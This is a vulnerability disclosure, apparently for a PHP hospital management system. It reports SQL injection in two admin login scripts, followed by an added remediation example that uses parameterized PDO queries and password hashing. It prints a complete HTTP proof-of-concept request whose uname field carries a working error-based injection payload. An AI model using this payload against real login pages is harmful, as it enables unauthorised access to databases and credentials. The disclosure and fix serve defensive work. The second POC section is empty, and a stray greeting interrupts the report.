Build environment: Apache 2.4.39; MySQL 5.7.26; PHP 7.3.4
1. SQL injection vulnerability exists in adminlogin.php
In admin/adminlogin.php, lines 6 to 34:
The front end sends a POST request that passes uname and pass to the back end, where they are assigned to $username and $password respectively.
Without any filtering, $username and $password are placed directly into the database query that checks them against the username and password stored in the database.
Because these variables are user-controllable, the account and password entered in the input boxes are executed as part of the SQL statement, resulting in a SQL injection vulnerability.
1. We can use sqlmap to validate
2. Manual SQL injection proof
POC
```http
POST /adminlogin.php HTTP/1.1
Host: vulhms.test
Content-Length: 153
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://vulhms.test
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://vulhms.test/adminlogin.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=p8jp2ja2hfplhfopqh577o2nd1
Connection: close

uname=' OR (SELECT 12 FROM(SELECT COUNT(*),CONCAT(USER(),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- ace&pass=admin123&login=Login
```
Hello, my brother
HMS has two SQL injection vulnerabilities
2. SQL injection vulnerability in admin.php
In admin/admin.php, uname and pass are assigned to the variables $uname and $pass, which are then placed into the database query, causing a SQL injection vulnerability.
1. We can use sqlmap to validate
2. Manual SQL injection proof
POC:
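Remediation sketch for the login check described in this report. This is an added example, not part of the original report and not the HMS project's code. The `admin` table, its `username` and `password_hash` columns, the `admin_login()` helper and the seeded row are assumptions, and an in-memory SQLite database stands in for MySQL so the script runs offline.

```php
<?php
// Added example: parameterized admin login. Table, columns and helper name are hypothetical.
// In-memory SQLite stands in for MySQL; with MySQL only the DSN changes, and
// PDO::ATTR_EMULATE_PREPARES should be set to false to get server-side prepares.
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);

$pdo->exec('CREATE TABLE admin (username TEXT PRIMARY KEY, password_hash TEXT NOT NULL)');
$seed = $pdo->prepare('INSERT INTO admin (username, password_hash) VALUES (?, ?)');
// Constructed sample account; the password is stored only as a hash.
$seed->execute(['admin', password_hash('admin123', PASSWORD_DEFAULT)]);

function admin_login(PDO $pdo, $uname, $pass): bool
{
    // Form fields can arrive as arrays (uname[]=x); accept strings only.
    if (!is_string($uname) || !is_string($pass)) {
        return false;
    }
    // The placeholder binds the value as data, so it never becomes SQL text.
    $stmt = $pdo->prepare('SELECT password_hash FROM admin WHERE username = ?');
    $stmt->execute([$uname]);
    $hash = $stmt->fetchColumn();
    // The password is compared in PHP against the stored hash, never inside the query.
    return is_string($hash) && password_verify($pass, $hash);
}

// The uname value from the report's POC request, passed through the bound parameter.
$poc = "' OR (SELECT 12 FROM(SELECT COUNT(*),CONCAT(USER(),FLOOR(RAND(0)*2))x "
     . "FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- ace";

// Each row: username, password, whether login must succeed.
$checks = [
    [$poc, 'admin123', false],     // POC string is just an unknown username
    ['admin', 'wrong', false],     // valid user, wrong password
    ['admin', 'admin123', true],   // valid credentials
];
foreach ($checks as [$u, $p, $expected]) {
    if (admin_login($pdo, $u, $p) !== $expected) {
        throw new RuntimeException('unexpected login result for: ' . $u);
    }
}
echo "all checks passed\n";
```

The same change applies to the query in admin.php: bind `$uname` through a placeholder and verify `$pass` against a stored hash instead of concatenating either value into the SQL string.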